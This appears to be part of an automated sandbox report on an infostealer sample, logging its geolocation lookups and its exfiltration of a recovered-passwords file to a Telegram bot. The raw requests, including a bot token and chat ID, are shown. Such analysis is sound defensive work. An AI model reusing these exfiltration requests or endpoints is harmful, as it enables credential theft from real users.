                                                                                                                  Connection: close
                                                                                                                  Age: 1852654
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsPsQqH1v87aYTPN9STNdruCi%2Fb6YXT0YPRdyCJHJC8Gi0gNmz%2F5BgYwKn%2B5H9lyKI6MatATdw6lPKhOQG4FeOX2DhC4s4aqIU7ifY9QrEvj5CZvXZXu%2BqtRSD3I2DL6G3mOBdnk"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1f9d8ce6729f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1929&min_rtt=1919&rtt_var=739&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1460730&cwnd=169&unsent_bytes=0&cid=249350ccf40baf35&ts=175&x=0"
                                                                                                                  2025-01-10 19:37:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.649727104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:47 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:47 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852656
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asFE3ojw9pH3sl3pketzC914pbzUwlDS4s5%2BgRCQKxqzKfPtyTu9Gy6MCW2z10Gjjn6PrMpQC0yATsBjbMyHq3UNrC3WCI%2BUyDRS9FWDu8qnzAD5hTvVNs6RUyvXKm78HAjimKXH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1fa6aa41729f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1948&rtt_var=741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1465863&cwnd=169&unsent_bytes=0&cid=d14f370d4b3cb33e&ts=139&x=0"
                                                                                                                  2025-01-10 19:37:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.649739104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:48 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:48 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852657
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZ%2FnzB0oo3UzRJBIq0CBZcqqJrNrGGWPAF6wOkwPLtZsxvF64rLBD7JESl3TLishtezRMOd7JCFYSR5yNb3GC%2FuGgkwkgxGUDw3vRSDEEmKbivpd6%2BnD2uJx3UTZfFzcLlp%2Bl3k0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1faeffcf0f5b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1663&rtt_var=933&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1006549&cwnd=221&unsent_bytes=0&cid=0c9d00e8cd929c12&ts=177&x=0"
                                                                                                                  2025-01-10 19:37:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.649750104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:50 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852659
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UroWN5KyTXMlw0PInQQKsk6JoxK%2BR6rQaGhlg3c7y9BtNRqEMx%2FvsU4WJYkPq2oFQwINU2nSheEUfXADIQzySNcv2%2FpCUKCluOQk%2BEjPBKTnRwg9GcGmrEjuZQyOMixrg9XnSPQq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1fb7692c43b3-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1595&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1830721&cwnd=203&unsent_bytes=0&cid=86e21b6783a5dffa&ts=163&x=0"
                                                                                                                  2025-01-10 19:37:50 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.649758104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:51 UTC857INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852660
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FLV%2FQua6OWmDMTkAHEQ91IMKy3nvWls7p4SXawNJk93NCliATJ1iESyKY2eWIzUxoru%2F2azzIlZUgqrcOwRSMJ6OZSNYh9QWd6pAj0z0V9xHf0oNq7BsmtSxibhc08BrcN9j81d"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1fc04c59c34f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1499&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1947965&cwnd=181&unsent_bytes=0&cid=e09a67445e56ee0e&ts=140&x=0"
                                                                                                                  2025-01-10 19:37:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.649770104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:52 UTC853INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:52 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852661
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jk7SNrj8pRrGJVKv%2B8EpJHi7yG0YeFkLPEJ6XtiVvnHkvYoLtLlgsFwkjxrQ3g5alw7kYRIwEPHArDylT8LQg7za%2F3ndvQBgdCDDSinaeZy9Z0qimcOdM8yC2keT6FnQOtSyPTsx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1fc84d7ac34f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1502&rtt_var=574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1887524&cwnd=181&unsent_bytes=0&cid=77a9d794e98507bc&ts=140&x=0"
                                                                                                                  2025-01-10 19:37:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.649782104.21.112.14431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:54 UTC855INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 362
                                                                                                                  Connection: close
                                                                                                                  Age: 1852663
                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                  cf-cache-status: HIT
                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4u2Djz9s5wvOVd6%2B7Vnb0dCb46CZYpJYyH2dqcwLvXHisMBL1k7o91KgwA%2BnMagzo1OhUXXiHmlhuWDnygBdTuAaUax2O1vRplrbO9dfW1oaPD0Hu5bv1%2Fc2I8ElKHHZiXjDSAA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fff1fd07caf0f5b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1544&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1794714&cwnd=221&unsent_bytes=0&cid=80ee5e849a4d207d&ts=150&x=0"
                                                                                                                  2025-01-10 19:37:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.649787149.154.167.2204431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:37:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 19:37:54 UTC344INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:54 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 19:37:54 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.649830149.154.167.2204431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 19:38:01 UTC350OUTPOST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 584
                                                                                                                  2025-01-10 19:38:01 UTC584OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 35 34 35 66 33 64 31 66 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 65 6e 67 69 6e 65 65 72 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 30 36 36 36 35 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 34 3a 33 37 3a
                                                                                                                  Data Ascii: --------------------------8dd32545f3d1fd1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:066656Date and Time: 10/01/2025 / 14:37:
                                                                                                                  2025-01-10 19:38:01 UTC388INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 10 Jan 2025 19:38:01 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                  2025-01-10 19:38:01 UTC548INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 33 35 38 37 34 34 32 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 69 74 69 6e 6f 32 34 31 38 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 69 74 69 6e 6f 32 34 31 38 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 31 34 36 34 33 33 31 33 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 75 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 64 61 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 61 75 6c 61 64 61 6d 73 32 34 31 39 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35
                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":1234,"from":{"id":7735874420,"is_bot":true,"first_name":"Pitino2418Bot","username":"Pitino2418Bot"},"chat":{"id":2146433139,"first_name":"Paul","last_name":"Adams","username":"pauladams2419","type":"private"},"date":17365


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:14:37:37
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\19d6P55zd1.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\19d6P55zd1.exe"
                                                                                                                  Imagebase:0x320000
                                                                                                                  File size:1'048'576 bytes
                                                                                                                  MD5 hash:13E4D4A655DB53282E89478EB1FDD462
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
